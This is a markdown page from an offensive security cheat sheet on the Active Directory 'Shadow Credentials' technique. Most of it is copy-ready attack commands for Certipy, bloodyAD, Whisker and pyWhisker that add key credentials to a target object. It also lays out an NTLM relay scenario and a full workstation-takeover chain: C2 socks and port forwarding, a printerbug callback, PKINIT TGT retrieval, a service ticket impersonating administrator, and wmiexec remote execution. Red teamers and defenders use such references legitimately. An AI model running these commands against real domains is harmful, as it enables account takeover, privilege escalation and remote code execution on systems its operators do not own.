pwd-shadow-credentials.md (5884B)
1 --- 2 title: "Password - Shadow Credentials" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/pwd-shadow-credentials.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-shadow-credentials.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Password - Shadow Credentials 12 13 > Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match. 14 15 :warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists 16 17 **Requirements**: 18 19 * Domain Controller on (at least) Windows Server 2016 20 * Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured 21 * PKINIT Kerberos authentication 22 * An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object 23 24 **Exploitation**: 25 26 * [ly4k/Certipy](https://github.com/ly4k/Certipy) 27 28 ```ps1 29 certipy shadow auto -account user -dc-ip 10.10.10.10 -dns-tcp -ns 10.10.10.10 -k -no-pass -target dc.domain.lab 30 certipy shadow -u 'attacker@domain.local' -p 'Passw0rd!' -dc-ip '10.0.0.100' -account 'victim' add 31 ``` 32 33 * [CravateRouge/bloodyAD](https://github.com/CravateRouge/bloodyAD): 34 35 ```ps1 36 bloodyAD --host 10.10.10.10 -u username -p 'P@ssw0rd' -d domain.lab add shadowCredentials targetpc$ 37 bloodyAD --host 10.10.10.10 -u username -p 'P@ssw0rd' -d domain.lab remove shadowCredentials targetpc$ --key <key from previous output> 38 ``` 39 40 * [eladshamir/Whisker](https://github.com/eladshamir/Whisker): 41 42 ```powershell 43 # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. 44 Whisker.exe list /target:computername$ 45 46 # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. 47 Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" 48 Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] 49 50 # Removes a key credential from the target object specified by a DeviceID GUID. 51 Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b 52 ``` 53 54 * [ShutdownRepo/pyWhisker](https://github.com/ShutdownRepo/pyWhisker): 55 56 ```ps1 57 # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. 58 python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" 59 60 # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. 61 pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" 62 python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" 63 64 # Removes a key credential from the target object specified by a DeviceID GUID. 65 python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" 66 ``` 67 68 ## Scenario 69 70 ### Shadow Credential Relaying 71 72 * Trigger an NTLM authentication from `DC01` (PetitPotam) 73 * Relay it to `DC02` (ntlmrelayx) 74 * Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) 75 * Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` 76 77 ### Workstation Takeover with RBCD 78 79 **Requirements**: 80 81 * `Print Spooler` service running 82 * `WebClient service` running 83 84 **Exploitation**: 85 86 * Using your C2, start a reverse socks on port 1080: `socks 1080` 87 * Enable port forward from port 8081 to 81 on the compromised machine: 88 89 ```ps1 90 rportfwd 8081 127.0.0.1 81 91 ``` 92 93 * Start the relay: 94 95 ```ps1 96 proxychains python3 ntlmrelayx.py -t ldaps://dc.domain.lab --shadow-credentials --shadow-target target\$ --http-port 81 97 ``` 98 99 * Trigger a callback on webdav: 100 101 ```ps1 102 proxychains python3 printerbug.py domain.lab/user:password@target.domain.lab compromised@8081/file 103 ``` 104 105 * Use [dirkjanm/PKINIT](https://github.com/dirkjanm/PKINITtools) to get a TGT for the machine account: 106 107 ```ps1 108 proxychains python3 gettgtpkinit.py domain.lab/target\$ target.ccache -cert-pfx </path/from/previous/command.pfx> -pfx-pass <pfx-pass> 109 ``` 110 111 * Elevate your privileges by creating a service ticket impersonating a local admin: 112 113 ```ps1 114 proxychains python3 gets4uticket.py kerberos+ccache://domain.lab\\target\$:target.ccache@dc.domain.lab cifs/target.domain.lab@domain.lab administrator@domain.lab administrator_target.ccache -v 115 ``` 116 117 * Use your ticket: 118 119 ```ps1 120 export KRB5CCNAME=/path/to/administrator_target.ccache 121 proxychains python3 wmiexec.py -k -no-pass domain.lab/administrator@target.domain.lab 122 ``` 123 124 ## References 125 126 * [Shadow Credentials: Workstation Takeover Edition - Matthew Creel - October 21, 2021](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition) 127 * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) 128 * [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - June 17, 2021](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)